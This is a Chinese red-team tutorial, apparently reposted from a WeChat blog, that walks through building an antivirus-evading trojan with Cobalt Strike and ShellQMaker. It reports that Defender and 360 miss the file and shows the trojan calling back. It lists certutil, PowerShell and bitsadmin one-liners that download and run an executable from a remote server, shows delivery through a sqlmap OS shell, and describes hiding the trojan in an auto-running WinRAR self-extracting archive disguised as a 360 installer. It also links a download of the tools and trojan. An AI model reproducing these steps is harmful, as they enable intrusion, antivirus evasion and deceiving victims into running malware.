从零开始的木马免杀到上线,附工具

admin
admin
admin
108829
文章
90
评论
2024年5月13日10:26:53评论28 views字数 2012阅读6分42秒阅读模式

 

0、环境配置说明

应该全部使用云服务器完整演示比较好,奈何太穷了买不起服务器,只能用本地环境演示。所需环境如下:

系统环境:

CentOS 7 ,Windows 10

软件环境

Cobalt Strike 4.7 , ShellQMaker, 360杀毒,Microsoft Defender。

如果使用云服务器,要把服务器端口放开

一、Cobalt Strike 服务器环境配置

CentOS 7.8 环境安装 Cobalt Strike

必备工具安装

yum -y install lrzsz,unzip

上传文件解压

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

然后切换至Cobalt Strike本地电脑保存的路径

lcd  文件存放路径

从零开始的木马免杀到上线,附工具

上传文件

put cobalt_strike_4.7.zip

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

解压文件

unzip cobalt_strike_4.7.zip

从零开始的木马免杀到上线,附工具

切换至CS路径,授予执行权限,并执行

cd cobalt_strike_4.7/sudo chmod +777 ./TeamServerImagesudo chmod +777 ./teamserver./teamserver 服务器IP  密码

从零开始的木马免杀到上线,附工具

二、木马生成

2.1 Payload生成

打开配置Cobalt Strike, 点击bbskali.cn.bat

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

填写服务端地址,账号,密码,然后点击Connect 连接

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

Payload 生成

点击 Payloads -> Stager Payload Generator

从零开始的木马免杀到上线,附工具

选择监听器

从零开始的木马免杀到上线,附工具

最开始是没有监听器的,需要自己新建,点击Add 会自动弹出当前的服务器IP, 点击确定即可,然后修改一下端口(自定义)

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

选择刚刚新建的监听器,然后点击Choose

从零开始的木马免杀到上线,附工具

Output 选择Raw

从零开始的木马免杀到上线,附工具

然后点击 Generate,保存生成的payload.bin

从零开始的木马免杀到上线,附工具

2.2 免杀木马生成

使用ShellQMaker,生成免杀木马。

将ShellQMaker1.2.zip解压,并将刚刚生成的payload.bin放在解压后的文件目录里面

从零开始的木马免杀到上线,附工具

在上方输入cmd ,进入命令行界面

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

输入命令生成免杀木马

ShellQMaker.exe payload.bin getShell.exe

说明:

ShellQMaker.exe [Paylaod文件] [生成的木马文件名,可自定义]

从零开始的木马免杀到上线,附工具

效果测试

Windows自带的 Defender未发现威胁

从零开始的木马免杀到上线,附工具

360杀毒

从零开始的木马免杀到上线,附工具

开个Windows Server2019 测试

可以看到木马成功运行

从零开始的木马免杀到上线,附工具

成功上线

从零开始的木马免杀到上线,附工具

三、漏洞利用

简单介绍一下常规利用方向

3.1 漏洞利用

例如文件上传漏洞。在已经上传木马的情况下,上传木马文件,上传后再执行木马文件。

还有一种方式就是可以命令执行类的漏洞或者SQL注入漏洞,这种方式需要有一台公网服务器,在上面搭建一个网站,将木马文件放在网站目录下面,然后执行远程下载执行命令运行木马文件。常见的执行命令如下:

Windows环境

certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe && exploit.exepowershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe" && exploit.exebitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/ms10-051.exe" c:\exploit.exe  && exploit.exe

举个简单例子,用SQLmap对SQL注入漏洞进行利用,使用 --os-shell参数获取服务器shell

从零开始的木马免杀到上线,附工具

然后使用命令进行远程文件下载执行,从输出来看是执行成功了。

从零开始的木马免杀到上线,附工具

Cobalt Strike成功上线

从零开始的木马免杀到上线,附工具

3.2 社工利用

使用社会工程学利用往往是最简单的方式,比如常见的邮件钓鱼,或者将生成木马捆绑软件

比如将360杀毒安装程序与之前生成的木马放在一起。

从零开始的木马免杀到上线,附工具

使用winrar进行压缩,选择添加到压缩文件中

从零开始的木马免杀到上线,附工具

勾选 创建自解压格式压缩文件

从零开始的木马免杀到上线,附工具

点击高级->自解压选项->常规->设置解压路径,windows路径一般设置为:C:WindowsSystem32 路径windows系统是都存在的,一般不会出错。

从零开始的木马免杀到上线,附工具

从零开始的木马免杀到上线,附工具

设置解压后自动运行木马文件,这里的路径一定要是前面填的路径,木马的名称一定要写对,和压缩前一致。

从零开始的木马免杀到上线,附工具

模式选择全部隐藏

从零开始的木马免杀到上线,附工具

更新 设置解压并更新文件,覆盖所有文件

从零开始的木马免杀到上线,附工具

然后点击确定即可

从零开始的木马免杀到上线,附工具

到这里算是完成了大部分了,为了让伪装更像,还可以更改软件图标,这里就不在演示了,如果想更改软件图标,可以参考我之前发的文章:https://mp.weixin.qq.com/s/4ixmdSHlPa4g_PfOEOZCdg 或者按照这篇文章,将生成的免杀木马替换即可。

相关工具 及木马 获取

链接:https://pan.baidu.com/s/1mm58uaF6PglWd-a6UPnNRw 提取码:41vn

从零开始的木马免杀到上线,附工具

原文始发于微信公众号(网络安全透视镜):【红队攻防】从零开始的木马免杀到上线,附工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日10:26:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从零开始的木马免杀到上线,附工具https://cn-sec.com/archives/2072834.html

发表评论

匿名网友 填写信息